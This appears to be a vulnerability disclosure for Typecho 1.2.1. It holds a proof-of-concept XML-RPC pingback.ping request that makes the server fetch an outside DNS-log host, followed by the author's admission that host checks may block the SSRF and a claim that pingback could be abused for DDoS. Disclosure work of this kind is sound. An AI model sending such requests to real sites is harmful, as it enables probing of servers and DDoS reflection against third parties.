Typecho v1.2.1 SSRF vulnerability

[Hebing123]

Description

Attackers can pass malicious URLs as parameters to the pingback.ping method by constructing malicious requests. The first parameter in this method allows passing any URL, and the server will send the request with that URL as a parameter. Due to the lack of effective input verification and filtering mechanisms, attackers can exploit this vulnerability to initiate server-side requests, which may lead to security issues such as sensitive information leakage and server resource abuse.

Proof of Concept

POST /index.php/action/xmlrpc HTTP/1.1
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: 192.168.160.147
Connection: Keep-alive

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://npnjie.dnslog.cn/</string></value>
</param>
<param>
<value><string>http://192.168.160.147/index.php/archives/10/</string></value>
</param>
</params>
</methodCall>

问题出现的环境

• 操作系统版本：Ubuntu 20.04
• Apache/NGINX 版本：Nginx 1.22.1
• 数据库版本：5.7.34
• PHP 版本：7.4
• Typecho 版本：1.2.1
• 浏览器版本：Chrome/114.0.5735.289 Safari/537.36

[Hebing123]

According to the description of the relevant personnel, the pingbackPing function in /var/widgett/xmlrpc.php file has carried out security checks on the destination host using the Common::checkSafeHost() method, restricting access to the Intranet and reserving the address. Other protocols except HTTP and HTTPS are restricted.

Therefore, this vulnerability may not exist as an SSRF vulnerability.

However, an attacker may use the Pingback module to carry out DoS or DDoS attacks on other sites. It is so dangerous that it constitutes a security vulnerability, I did not apply for a CVE number for this vulnerability, but it could still evolve into a DOS vulnerability. This is worth noting.

Research data demonstrating possible harm: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/vulnerability/5759/wordpress-xmlrpc-pingback-ddos-vulnerability.